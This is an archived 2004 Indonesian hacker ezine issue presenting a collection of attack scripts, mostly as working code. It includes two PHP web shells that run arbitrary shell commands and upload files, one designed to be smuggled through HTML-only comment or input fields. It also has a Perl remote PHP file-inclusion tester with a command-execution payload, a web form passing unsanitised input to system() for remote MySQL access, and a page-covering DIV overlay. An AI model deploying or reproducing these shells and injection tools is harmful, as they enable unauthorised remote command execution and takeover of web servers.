Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

Echo Magazine Issue 09 Phile 0x013

eZine's profile picture
eZine lover (@eZine)
Published in 
Echo Magazine
 · 4 years ago

  

 

       
       - ____________________   ___ ___ ________    
       --\_   _____/\_   ___ \ /   |   \\_____  \-- 
	 -|    __)_ /    \  \//    ~    \/   |   \-- 
	 -|        \\     \___\    Y    /    |    \-- 
	-/_______  / \______  /\___|_  /\_______  /- 
	 -      -\/        -\/      -\/        -\/-  

 
					    .OR.ID 
ECHO-ZINE RELEASE 09 
  
 Author: y3dips && K-159  
 Online @ www.echo.or.id :: http://ezine.echo.or.id 

 
== ECHO Skrapt 2004 == 

01./Catet info browser dan IP >dot< php   ~[ y3dips ] 
02./Uplod File && $hell command via browser >dot< php    ~[ y3dips ] 
03.\General PHP injection Testing script >dot< perl    ~[ y3dips ] 
04.|MySQL management under web                ~[ K-159 ] 
05.\PHP upload file in HTML rulez..          ~[ K-159 ] 
06.\using DIV to manipulating all of the page area :) (*smart enough isnt it) ~[k-159 ] 

.: BEGIN 
  
+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 
01. Skrip Untuk Mencatat IP dan INFO BROWSER 

By       : y3dips 
Language : PHP 
Resource : Buku php , from phpinfo(); (to get the variable) 
Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt 
Comment  : skrip ini dibuat dengan bahasa pemrograman PHP , pd awalnya di gunakan pada  
           situs echo.or.id , untuk halaman index-nya 

 
/*----- snip ----- 
            

<html> 
<head> 
<title> catet info browser dan ip </title> 
 <?php 
   if($HTTP_VIA == "") 
  printf("<div align= center>%s :: 
  diakses dari<i><b> ip </b></i> <b>$REMOTE_ADDR</b><br> dengan <i><b> browser</b></i> 
  <b> $HTTP_USER_AGENT</b> </div>",date("D, d F Y")); 
  
  else 
  printf("<div align= center>%s ::  
 </b> diakses dari<i><b> ip </b></i> <b>$HTTP_X_FORWARDED_FOR</b><br> dengan <i><b> browser</b></i>  
 <b>$HTTP_USER_AGENT</B> melalui <b>$HTTP_VIA</b> dengan ip <i>$REMOTE_ADDR</i></div>",date("D, d F Y")); 
    ?> 
  </p> 
</body> 
</html> 

 
------- snip -----*/ 

 

 

 
+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

 

02. Uplod File && $hell command via browser >dot< php    ~[ y3dips ] 

By       : y3dips 
Language : PHP 
Resource : .....PHP book, PHP manual <dot> chm 
Published: .... 
Comment  : skrip ini dibuat dengan bahasa pemrograman PHP , digunakan sebagai   halaman  
           untuk mengupload file dan eksekusi $hell command via browser , dengan beberapa 
           settingan 'tertentu' yang di "allow" pada php.ini dan httpd.conf 

/*----- snip ----- 

<!-- upload php shell made by y3dips (echo.or.id) for test only       --> 
<!-- greetz to K-159 ,the_day, z3r0byt3, m0by , comex, c-a-s-e , S'to --> 
<html> 
<head> 
<title>#E-C-H-O Upl0ad  $hell</title> 
</head> 
<BODY bgcolor="#000000"> 
<!-- ngatur direktori --> 
<? if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } ?> 
<table> 
<tr><td bgcolor=#cccccc> 

<!-- eksekusi command dengan passthru --> 

<? 
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; } 
echo "<b>"; 
echo "<div align=left><textarea name=report cols=70 rows=15>"; 
echo "".passthru($_POST['cmd']).""; 
echo "</textarea></div>"; 
echo "</b>"; 
?> 
</td></tr></table> 
<!-- upload file --> 
<? 
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"])) 
{ 
copy($HTTP_POST_FILES["filenyo"][tmp_name], 
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name]) 
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial> 
<div>file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."</div></font></td></tr></table>"); 
} 
?> 
<table width=100% cellpadding=0 cellspacing=0 > 
<tr><td> 

<!-- form eksekusi command --> 

<? 
echo "<form name=command method=post>"; 
echo "<font face=Verdana size=1 color=red>"; 
echo "<b>[CmD ]</b><input type=text name=cmd size=33>  "; 
if ((!$_POST['dir']) OR ($_POST['dir']==""))  
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; } 
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; } 
echo "  <input type=submit name=submit value=\"0k\">"; 
echo "</font>"; 
echo "</form>"; 
?> 
</td></tr></table> 
<table width=100% cellpadding=0 cellspacing=0 > 

<!-- form upload --> 

<? 
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; 
echo "<font face=Verdana size=1 color=red>"; 
echo "<b> [EcHo]</b>"; 
echo "<input type=file name=filenyo size=70> "; 
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; } 
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; } 
echo "<input type=submit name=submit value=\"0k\">"; 
echo "</font>"; 
echo "</form>"; 
?> 
</td></tr></table> 
</html> 

 
------- snip -----*/ 

 

 

 
+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

 
03.\General PHP injection Testing script 

 
By       : y3dips 
Language : PeRl 
Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt 
Published: ... in this ezine 
Comment  : Skrip ini dibuat untuk testing remote injection terhadap php vuln 
           sebenarnya untuk menggantikan fungsi browser , khususnya lagi dikembangkan 
           dengan menggunakan file sebagai database target *_^ 

 

 
Petunjuk : 

 masukkan lengkap path target yang vulnerable sesuai vulnerablenya, misal : 
 $target = www.dudul.com/index.php?pageurl= 

 serta path lengkap exploit filenya (read about injection script in attacker side) 
 $xploit = www.keren.com/echo.txt 

 
 dan yang perlu dilakukan dalam inputan adalah 
 perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt 

 
/*----- snip ----- 

# xplo.pl 
#!/usr/bin/perl -w  
# Remote Testing PHP injection by y3dips [for testing only] 

print "  * Remote Testing PHP injection by y3dips *\n"; 

require LWP::UserAgent; 

if(@ARGV == 2) 
	{ 
       
$target= $ARGV[0];    
$xploit= $ARGV[1];    

my $ua = LWP::UserAgent->new; 
$ua->agent("MSIE/6.0 Windows"); 
$ua->timeout(10); 
$ua->env_proxy; 

$url = "http://$target$xploit"; 

my $injek = $ua->get($url);  

	print "---------------------------------------------------\n"; 

	if ($injek->is_success)  
		{ print ("    Sepertinya Vulnerable\n");       }  
	else 	{ print ("    Sepertinya Tidak Vulnerable\n"); } 

	print "---------------------------------------------------\n"; 

	} 

else{ 
print "Gunakan: perl $0 [path vulnerable] [path xplo]  \n";  
}   

 

===================== 

 
echo.txt 

 
-- cut -- 

<? 
echo "".passthru(' id ').""; 
?> 

-- cut -- 

------- snip -----*/ 

 

 

 
+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

 

04.\MySQL management under web 

 
By       : k-159 
Language : Php 
Resource : ..., based on explorer 1.4 lost noobs 
Published: ... in this ezine 
Comment  : Manage SQL under web base 

 
/*----- snip ----- 

 
<!-- sql remote injection script by K-159          --> 
<!-- @t http://aikmel.com en http://echo.or.id     --> 
<!-- based on explorer 1.4 lost noobs              --> 

<html> 
<head><title>.:You Landed on K-159 Project:.</title> 
<body bgcolor="blue"> 

<? 

echo(" 
<FORM ENCTYPE=\"multipart/form-data\"  METHOD=POST> 
<br><br><hr><br><br> 

Enter mysql client binary <br> 
<input name=\"sql_client\" type=\"text\" value=\"mysql\"> 

<br><br>Enter the login<br> 
<input name=\"sql_login\" type=\"text\" value=\"root\"> 

<br><br>Enter the password<br> 
<input name=\"sql_password\" type=\"text\" value=\"none\"> 

<br><br>Enter address of target<br> 
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\"> 

<bR><br>Enter other port of mysql<br> 
<input name=\"sql_options\" type=\"text\" value=\"\"> 

 
<br><br>Enter valid SQL queries<br> 
<TEXTAREA input name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES; 
# USE database_name; SHOW TABLES; 
# SELECT * FROM table_name;</TEXTAREA> 

<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\"> 
<br><br><hr> 
</font></form> 

       "); 

 
if($sql_client) 
  { 
  if ($sql_host == "Provide a target") // This checks that a target is set 
     { 
     echo("Please provide a valid target."); // No target is set 
     } 
  else if($sql_password == "none") // Ok for target, processing if no password is set 
    { 
    $sql_exec_option = "--execute=\"$sql_query\""; 
    $system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option"; 
    $system_cmd=str_replace("\\\"","\"",$system_cmd); 
    $system_cmd=str_replace("\\'","'",$system_cmd); 
    echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results : 
------------------------------------------------------------ 

"); 
    system($system_cmd,$var); 
    if($var != 0){ 
    system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } 
    echo("</TEXTAREA>"); 
    } 

 else // processing when target is ok and when a password is provided 
    { 
    $sql_exec_option = "--execute=\"$sql_query\""; 
    $system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option"; 
    $system_cmd=str_replace("\\\"","\"",$system_cmd); 
    $system_cmd=str_replace("\\'","'",$system_cmd); 
    echo("<br><br>Results for query : <b>$system_cmd</b> :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results : 
------------------------------------------------------------ 

"); 
    system($system_cmd,$var); 
    if($var != 0){ 
    system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } 
    echo("</TEXTAREA>"); 
    } // end of else 
   } 

?> 
</html> 

------- snip -----*/ 

 

 

 

+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

 

05.\PHP upload file in HTML rulez.. 

 
By       : k-159  
Language : HTML 
Resource : ..., 
Published: ... in this ezine 
Comment  : skrip ini dibuat saat mencoba membuat upload skrip dengan menumpang di box (comment, 
           input) yang bisa hanya di inputkan html , but the server allow to execute php :) 

 
/*----- snip ----- 

<html> 
<head> 
<title>K-159 Project</title> 
</head> 
<BODY bgcolor="#000000"> 

 
<script language="php"> 
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } 
</script> 
<table> 
<tr><td bgcolor=#cccccc> 

<script language="php"> 
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ;uname -ar;pwd ;id;cat /etc/hosts "; } 
echo "<b>"; 
echo "<div align=left><textarea name=report cols=70 rows=15>"; 
echo "".passthru($_POST['cmd']).""; 
echo "</textarea></div>"; 
echo "</b>"; 
</script> 
</td></tr></table> 

<script language="php"> 
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"])) 
{ 
copy($HTTP_POST_FILES["filenyo"][tmp_name], 
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name]) 
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=arial> 
<div>file [ ".$HTTP_POST_FILES["filenyo"][name]." ] Error Cuk !! 
!!</div></font></td></tr></table>"); 
} 
</script> 
<table width=100% cellpadding=0 cellspacing=0 > 
<tr><td> 

<script language="php"> 
echo "<form name=command method=post>"; 
echo "<font face=Verdana size=1 color=red>"; 
echo "<b>[CmD ]</b><input type=text name=cmd size=33>  "; 
if ((!$_POST['dir']) OR ($_POST['dir']=="")) 
{ echo " <b>[Dir]</b><input type=text name=dir size=40 value=".exec("pwd").">"; } 
else { echo "<input type=text name=dir size=40 value=".$_POST['dir'].">"; } 
echo "  <input type=submit name=submit value=\"0k\">"; 
echo "</font>"; 
echo "</form>"; 
</script> 
</td></tr></table> 
<table width=100% cellpadding=0 cellspacing=0 > 

<script language="php"> 
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; 
echo "<font face=Verdana size=1 color=red>"; 
echo "<b> [EcHo]</b>"; 
echo "<input type=file name=filenyo size=70> "; 
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=70 value=".exec("pwd").">"; } 
else { echo "<input type=hidden name=dir size=70 value=".$_POST['dir'].">"; } 
echo "<input type=submit name=submit value=\"0k\">"; 
echo "</font>"; 
echo "</form>"; 
</script> 
</td></tr></table> 
</html> 
------- snip -----*/ 

 

 

 

+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

 

06.\using DIV to manipulating all of the page area :) (*smart enough isnt it? ) 

 
By       : k-159 
Language : HTML 
Resource : ..., 
Published: ... in this ezine 
Comment  : skrip ini digunakan untuk menutupi seluruh skrip lainnya (dengan penggunaan DIV) 

 
Petunjuk : letakkan potongan skrip ini di atas kode " page anda " :D  

 
/*----- snip ----- 

<div id="Layer1" style="position:absolute; left:0; top:0; width:4000; height:4090; 
z-index:1; background-color: #000000; layer-background-color: #ccccc; border: 1px none #000000"> 

------- snip -----*/ 

 

+++++       +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 

 

 

Disclamier: 

all script on this article for educational purpose, echo.or.id does not accept responsibility  
for any damage or injury caused as a result of its use 

 
*greetz to:  
	 
        anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel 
	all $ecurity Industry 1n INDONESIA 

	kirimkan kritik && saran ke echostaff[at]echo<dot>or<dot>id

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
guest's profile picture
@guest
19 Nov 2024
deve essere molto dolce, zucchero piu' lo zuccherino della frutta
guest's profile picture
@guest
19 Nov 2024
tomorrow here it would be -2
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT